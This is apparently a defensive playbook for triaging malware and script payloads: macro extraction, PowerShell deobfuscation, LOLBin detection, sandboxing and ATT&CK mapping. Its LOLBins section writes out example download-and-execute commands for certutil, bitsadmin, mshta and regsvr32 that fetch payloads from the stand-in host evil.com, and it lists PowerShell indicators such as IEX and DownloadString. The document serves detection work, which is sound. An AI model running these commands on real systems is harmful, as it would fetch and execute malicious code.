Malware and Script Payload Triage

Purpose and Scope

This playbook covers initial triage of malware samples and script based payloads, including Office macros, PowerShell, and living off the land binaries (LOLBins). The goal is rapid categorization and indicator extraction, not deep reverse engineering.

Prerequisites

• Analysis environment: Isolated VM or sandbox (ANY.RUN, Joe Sandbox, Cuckoo)
• Static analysis tools: olevba, oledump, strings, file, PEStudio
• Dynamic analysis: Process Monitor, Wireshark, Sysmon in sandbox
• Reputation services: VirusTotal, Hybrid Analysis
• MITRE ATT&CK: For technique mapping

Detection Goals

Triage aims to determine:

• Is this sample malicious or benign?
• What capabilities does it have?
• What indicators can be extracted for detection?
• What MITRE ATT&CK techniques does it use?
• Is this part of a known malware family or campaign?

Office Document Analysis

Initial Checks

• Check file hash against VirusTotal
• Identify file type: use the file command, not just extension
• Look for macros: VBA in .doc/.xls, or embedded objects in newer formats

Macro Extraction with olevba

Use oletools to extract and analyze VBA:

olevba suspicious.doc

Look for:

• AutoOpen, Document_Open, Workbook_Open (auto execution)
• Shell, WScript.Shell, CreateObject (code execution)
• PowerShell, cmd, mshta invocations
• Base64 or hex encoded strings
• URLs, IP addresses, file paths

Common Macro Techniques

• Download and execute: macro downloads payload from URL and runs it
• Embedded payload: executable hidden in document properties or forms
• DDE abuse: Dynamic Data Exchange to run commands without macros
• Template injection: document loads remote template with malicious macro

PowerShell Analysis

Decoding Obfuscation

Common obfuscation patterns:

• Base64: -EncodedCommand or -enc parameter
• Compression: GZip or Deflate streams
• String manipulation: Concatenation, replace, reverse
• Variable substitution: Using environment variables or WMI

Decode base64 commands:

[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('base64string'))

Key Indicators in PowerShell

• IEX (Invoke-Expression): executes string as code
• DownloadString, DownloadFile: network retrieval
• New-Object Net.WebClient: network operations
• Reflection.Assembly: loading code in memory
• Bypass execution policy flags

Living off the Land Binaries (LOLBins)

Attackers use built in Windows tools to avoid detection. Common LOLBins:

Download and Execute

• certutil: certutil -urlcache -split -f http://evil.com/payload.exe
• bitsadmin: bitsadmin /transfer job http://evil.com/payload.exe
• mshta: mshta http://evil.com/payload.hta
• regsvr32: regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll

Code Execution

• rundll32: Execute DLL exports or JavaScript
• wmic: Process creation and script execution
• cscript/wscript: Run VBS and JS files
• msiexec: Install from URL

Detection Approach

Monitor for LOLBins with:

• Unusual command line arguments
• Network connections from unexpected processes
• Execution from unusual parent processes
• Execution from temp or user writable directories

Sandbox Analysis

Dynamic Execution

1. Submit sample to sandbox or detonate in isolated VM
2. Monitor: process creation, file system, registry, network
3. Capture: dropped files, network traffic, memory artifacts
4. Extract indicators: URLs, IPs, domains, file hashes, mutexes

Sandbox Evasion Indicators

Samples may check for analysis environments:

• VM detection (VMware, VirtualBox artifacts)
• Sandbox usernames or computer names
• Low CPU/memory resources
• Lack of user activity (mouse movement, documents)
• Time based delays

Indicator Extraction

Extract and document:

• File hashes (MD5, SHA1, SHA256)
• Network indicators (domains, IPs, URLs)
• File paths and names
• Registry keys modified
• Mutex names
• Command line patterns
• YARA signatures if available

MITRE ATT&CK Mapping

Map observed behaviors to techniques:

• T1059: Command and Scripting Interpreter
• T1204: User Execution
• T1218: System Binary Proxy Execution
• T1027: Obfuscated Files or Information
• T1105: Ingress Tool Transfer

Response Actions

• Block extracted IOCs at perimeter and endpoint
• Create detection rules for observed command patterns
• Hunt for related samples using YARA or file metadata
• Share indicators with threat intelligence platforms
• Update email filters for attachment types used

References

• LOLBAS Project: lolbas-project.github.io
• oletools: github.com/decalage2/oletools
• MITRE ATT&CK: attack.mitre.org
• ANY.RUN: any.run